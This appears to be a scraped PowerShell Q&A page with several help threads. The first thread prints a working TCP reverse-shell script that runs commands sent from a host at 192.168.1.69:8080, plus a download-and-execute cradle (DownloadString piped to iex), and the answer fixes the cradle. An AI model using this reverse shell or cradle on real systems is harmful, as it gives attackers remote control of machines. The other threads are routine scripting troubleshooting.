PowerShell issue to invoke shell - powershell

Im trying to get a shell in my Win10 virtual machine but i get these
errors.
PS C:\Users\Diego Sepu> IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.69/r.ps1')
IEX : At line:13 char:39
... s.TCPClient("192.168.1.69\'94,8080)).GetStream();[byte[]]$bt=0..65535 ...
The string is missing the terminator: ".
At line:14 char:2
}
~
Missing closing ')' in expression.
At line:1 char:1
{\rtf1\ansi\ansicpg1252\cocoartf1504\cocoasubrtf820
~
Missing closing '}' in statement block or type definition.
At line:1 char:1
IEX (New-Object Net.WebClient).DownloadString(...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
FullyQualifiedErrorId : TerminatorExpectedAtEndOfString,Microsoft.PowerShell.Commands.InvokeExpressionCommand
Code:
$sm=(New-Object Net.Sockets.TCPClient("192.168.1.69",8080)).GetStream()
[byte[]]$bt=0..65535|%{0}
while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0)
{
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i)
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1))
$sm.Write($st,0,$st.Length)
}


(new-object Net.WebClient).DownloadString("http://192.168.1.69:8080/r.ps1") | iex
Try doing downloadstring first then piping the results into invoke-espression In your original screenshot you aren't invoking the contents of r.ps1 infact you are attempting to invoke the download itself. By piping the results of DownloadStringthe actual contents of r.ps1 will be extecute

Related

Splatting Missing '=' operator after key in hash literal was incomplete?

I'm trying to execute this script using Splatting for the remote server (through PowerShell ISE).
However, it is always stuck and failed.
I've followed the suggestion as in https://www.ibm.com/support/knowledgecenter/en/SSKMKU/com.ibm.wincollect.doc/t_ug_wincollect_cli_install.html
Script:
$Args = #{
'EXE'='\\PRDFS01-VM\DSL\wincollect-7.3.0-24.x64.exe'
'INSTALLDIR'='C:\Program Files\IBM\WinCollect\'
'LOG_SOURCE_AUTO_CREATION_ENABLED'='True'
'LOG_SOURCE_AUTO_CREATION_PARAMETERS'=""
'Component1.AgentDevice'='DeviceWindowsLog'
'Component1.Action'='create'
'Component1.LogSourceName'="$env:COMPUTERNAME"
'Component1.LogSourceIdentifier'="$env:COMPUTERNAME"
'Component1.Dest.Name'='IBMQradar'
'Component1.Dest.Hostname'='192.168.111.111'
'Component1.Dest.Port'='514'
'Component1.Dest.Protocol'='TCP'
'Component1.Log.Security'='true'
'Component1.Log.System'='true'
'Component1.Log.Application'='true'
'Component1.Log.DNS+Server'='true'
'Component1.Log.File+Replication+Service'='true'
'Component1.Log.Directory+Service'='true'
'Component1.RemoteMachinePollInterval'='3000'
'Component1.EventRateTuningProfile'='Default+(Endpoint)'
'Component1.MinLogsToProcessPerPass'='100'
'Component1.MaxLogsToProcessPerPass'='150'
}
$process = Start-Process -ArgumentList "/s" "/v" "/qn" #Args -Wait -PassThru
$process.ExitCode
Error:
At line:9 char:15
+ Component1.Action=create
+ ~
Missing '=' operator after key in hash literal.
At line:29 char:18
+ $process.ExitCode
+ ~
Missing '=' operator after key in hash literal.
At line:29 char:18
+ $process.ExitCode
+ ~
The hash literal was incomplete.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : MissingEqualsInHashLiteral
OK, after updating it as above, now the error is different:
Start-Process : A positional parameter cannot be found that accepts argument '/qn'.
At line:25 char:12
+ $process = Start-Process -ArgumentList "/s" "/v" "/qn" #Args -Wait -P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Start-Process], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.StartProcessCommand

Hashtable keys cannot contain dots unless you quote them.
This doesn't work.
$Args = #{
EXE='\\PRDFS01-VM\DSL\wincollect-7.3.0-24.x64.exe /s /v"/qn'
Component1.Action=create
}
This does (note that create also requires quotes)
$Args = #{
EXE='\\PRDFS01-VM\DSL\wincollect-7.3.0-24.x64.exe /s /v"/qn'
'Component1.Action'='create'
}
ISE will actually even give you syntax errors about this, so I'm not quite sure how that went unnoticed.

What does this error mean Set-Location "path" is null in Powershell?

Total newbie here...
I am attempting to execute a ps1 file using Powershell and receiving an error. What does this error mean? I'm concerned that OneDrive is causing an issue with the path.
Running this ps1 file by opening powershell and entering:
PowerShell -executionpolicy Bypass -NoExit C:\Users\Terry\OneDrive\desktop\WindowsPull.ps1
This is the file:
$segmentFolders = Get-ChildItem | where {$_.Attributes -eq 'Directory'}
Error:
Set-Location : Cannot process argument because the value of argument "path" is null. Change the value of argument
"path" to a non-null value.
At C:\Users\Terry\OneDrive\desktop\WindowsPull.ps1:4 char:1
+ Set-Location $videoDir.FullName
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Set-Location], PSArgumentNullException
+ FullyQualifiedErrorId : ArgumentNull,Microsoft.PowerShell.Commands.SetLocationCommand

How to call a powershell script to another powershell script with arguments?

I just need to call another script and pass the parameters to it.
I tried doing invoke-expression to access it, i tried using &, and nothing worked
I tried doing the following:
$hostfile = "C:\Users\username\Desktop\csvfile_test.csv"
$outFile = ".\testerFile.xlsx"
& '.\organizer.ps1' "-csvFile $hostfile -outputPath $outFile "
Invoke-Expression 'C:\Users\username\Desktop\organizer.ps1' "$hostfile $outFile"
I receive the following errors:.
with ampersand (&):
PS C:\Users\username\Desktop> C:\Users\username\Desktop\scanner.ps1
Exception calling "ReadLines" with "1" argument(s): "The given path's format is not supported."
At C:\Users\username\Desktop\scanner.ps1:48 char:1
+ [System.IO.File]::ReadLines("$csvFile") | ForEach-Object {
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : NotSupportedException
with invoke-expression:
Exception calling "ReadLines" with "1" argument(s): "The given path's format is not supported."
At C:\Users\username\Desktop\scanner.ps1:48 char:1
+ [System.IO.File]::ReadLines("$csvFile") | ForEach-Object {
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : NotSupportedException
Invoke-Expression : A positional parameter cannot be found that accepts argument 'C:\Users\username\Desktop\csvfile_test.csv .\testerFile.xlsx'.
At C:\Users\username\Desktop\scanner.ps1:69 char:1
+ Invoke-Expression 'C:\Users\username\Desktop\organizer.ps1' "$host ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-Expression], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.InvokeExpressionCommand

When you write this:
& '.\organizer.ps1' "-csvFile $hostfile -outputPath $outFile "
you are passing a single parameter to the script (one quoted string). That's not what you want.
This is what you need:
$hostfile = "C:\Users\username\Desktop\csvfile_test.csv"
$outFile = ".\testerFile.xlsx"
.\organizer.ps1 -csvFile $hostfile -outputPath $outFile
First, you don't need the & (invocation) operator because your command name (the organizer.ps1 script in the current location, in this example) doesn't contain spaces. (You can add it if you want, but it's unnecessary in this scenario.)
Second, the -csvFile and -outputPath parameters each require a string.

How to escape "at sign" (#) in Invoke-Expression -Command?

When I run this command in command-line, it works as expected:
C:\>p4 changes #2019/01/16,#now
...
But when I use it in powershell script, I can't get it working.
First attempt:
PS C:\> Invoke-Expression -Command "p4 changes #2018/01/16, #now"
Invoke-Expression : At line:1 char:25
+ p4 changes #2018/01/16, #now
+ ~~~~
Splatted variables like '#now' cannot be part of a comma-separated list of arguments.
At line:1 char:1
+ Invoke-Expression -Command "p4 changes #2018/01/16, #now"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : SplattingNotPermittedInArgumentList,Microsoft.PowerShell.Commands.InvokeExpressionCommand
Escaping comma (successfully):
PS C:\> Invoke-Expression -Command "p4 changes #2018/01/16',' #now"
p4 : Unintelligible revision specification '2018/01/16'.
At line:1 char:1
+ p4 changes #2018/01/16',' #now
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (Unintelligible ...n '2018/01/16'.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Now I think the problem is in "at character" ("#") being interpreted on some level. But I've failed to escape it using multiple methods. How to achieve this?
UPD Testing your ideas:
Grave Accent:
PS C:\> Invoke-Expression -Command "p4 changes `#2018/01/16',' `#now"
p4 : Unintelligible revision specification '2018/01/16'.
At line:1 char:1
+ p4 changes #2018/01/16',' #now
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (Unintelligible ...n '2018/01/16'.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Single quote (problem with comma):
PS C:\> Invoke-Expression -Command 'p4 changes #2018/01/16, #now'
Invoke-Expression : At line:1 char:25
+ p4 changes #2018/01/16, #now
+ ~~~~
Splatted variables like '#now' cannot be part of a comma-separated list of arguments.
At line:1 char:1
+ Invoke-Expression -Command 'p4 changes #2018/01/16, #now'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : SplattingNotPermittedInArgumentList,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Stop using double quotes, if you have no expandable content then use single quotes. See documentation for about_Quoting_Rules
Otherwise it's as others have said, use the backtick (`).

Working solution:
$cmd = #'
p4 changes #2018/01/16','#now
'#;
Invoke-Expression $cmd

Powershell: pass system key as a argument

I want to pass -Unique as parameter for select-string
param(
$y="CAR"
$parameter=""
)
get-childitem -r -i "*.txt"| select-string "TABLE FILE $y" | Select-Object filename,path $parameter
But whenever i try to pass the parameter, i get the following error
powershell : Select-Object : A positional parameter cannot be found that accepts argument '-Unique'.
At line:1 char:1
+ powershell -ExecutionPolicy ByPass -File x.ps1 -parameter '-Unique'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (Select-Object :...ment '-Unique'.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
At C:\Users\aravikumar\Downloads\x.ps1:5 char:62
+ ... elect-string "TABLE FILE $y" | Select-Object filename,path $parameter
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Select-Object], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.SelectObjectCommand
Also want to pass multiple system key if possible such as -unique -simplesearch -casesensitive

You can't pass a switch as a string parameter like that. You need to use a technique called 'splatting'. See help about_splatting or https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_splatting